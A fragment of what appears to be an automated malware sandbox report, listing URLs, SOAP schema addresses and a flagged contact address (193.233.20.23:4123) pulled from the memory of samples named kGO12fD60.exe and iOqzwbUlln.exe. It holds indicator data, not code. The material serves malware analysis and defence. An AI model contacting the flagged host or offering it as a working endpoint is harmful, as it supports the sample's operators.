                    http://tempuri.org/Entity/Id60%URL Reputationsafe
                    http://tempuri.org/Entity/Id60%URL Reputationsafe
                    http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id200%URL Reputationsafe
                    http://tempuri.org/Entity/Id210%URL Reputationsafe
                    http://tempuri.org/Entity/Id220%URL Reputationsafe
                    http://tempuri.org/Entity/Id220%URL Reputationsafe
                    http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id100%URL Reputationsafe
                    http://tempuri.org/Entity/Id110%URL Reputationsafe
                    http://tempuri.org/Entity/Id120%URL Reputationsafe
                    http://tempuri.org/Entity/Id120%URL Reputationsafe
                    http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id130%URL Reputationsafe
                    http://tempuri.org/Entity/Id140%URL Reputationsafe
                    http://tempuri.org/Entity/Id150%URL Reputationsafe
                    http://tempuri.org/Entity/Id160%URL Reputationsafe
                    http://tempuri.org/Entity/Id160%URL Reputationsafe
                    http://tempuri.org/Entity/Id170%URL Reputationsafe
                    http://tempuri.org/Entity/Id180%URL Reputationsafe
                    http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id190%URL Reputationsafe
                    http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                    193.233.20.23:41239%VirustotalBrowse
                    http://tempuri.org/Entity/Id17Response0%URL Reputationsafe
                    193.233.20.23:41230%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    193.233.20.23:4123true
                    • 9%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/chrome_newtabkGO12fD60.exe, 00000005.00000002.404788400.0000000003751000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003617000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037CF000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000384D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinarykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://tempuri.org/Entity/Id12ResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/Entity/Id2ResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/Entity/Id21ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://tempuri.org/Entity/Id9kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id8kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://tempuri.org/Entity/Id5kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/PreparekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id4kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id7kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id6kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id19ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssuekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/faultkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsatkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Entity/Id15ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://tempuri.org/Entity/Id6ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.ip.sb/ipiOqzwbUlln.exe, 00000000.00000003.313758159.00000000046FB000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, kGO12fD60.exe, 00000005.00000003.351298943.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.407000586.0000000004BB0000.00000004.08000000.00040000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.407316723.0000000005130000.00000004.08000000.00040000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402621555.00000000021C6000.00000004.00000020.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmp, rWE40pD80.exe.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/sckGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://tempuri.org/Entity/Id9ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id20kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id21kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://tempuri.org/Entity/Id22kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/IssuekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://tempuri.org/Entity/Id1ResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=kGO12fD60.exe, 00000005.00000002.404788400.0000000003751000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003617000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037CF000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000384D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedkGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/ReplaykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegokGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64BinarykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressingkGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssuekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/CompletionkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trustkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://tempuri.org/Entity/Id10kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id11kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id12kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id16ResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/CancelkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id13kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id14kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id15kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id16kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/NoncekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://tempuri.org/Entity/Id17kGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id18kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id5ResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://tempuri.org/Entity/Id19kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnskGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id10ResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002A48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RenewkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm8DkGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id8ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002AA0000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://schemas.xmlsoap.org/ws/2006/02/addressingidentitykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/soap/envelope/kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://search.yahoo.com?fr=crmas_sfpfkGO12fD60.exe, 00000005.00000002.404788400.0000000003751000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037EC000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003617000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000037CF000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000384D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003916000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000386A000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003669000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000028C9000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.000000000283D000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002956000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.0000000002725000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.0000000003634000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000029E2000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.404788400.000000000376E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeykGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1kGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trustkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingexkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wscoorkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/NoncekGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponsekGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultkGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/RenewkGO12fD60.exe, 00000005.00000002.402878433.000000000269E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://tempuri.org/Entity/Id17ResponsekGO12fD60.exe, 00000005.00000002.402878433.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, kGO12fD60.exe, 00000005.00000002.402878433.00000000025F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
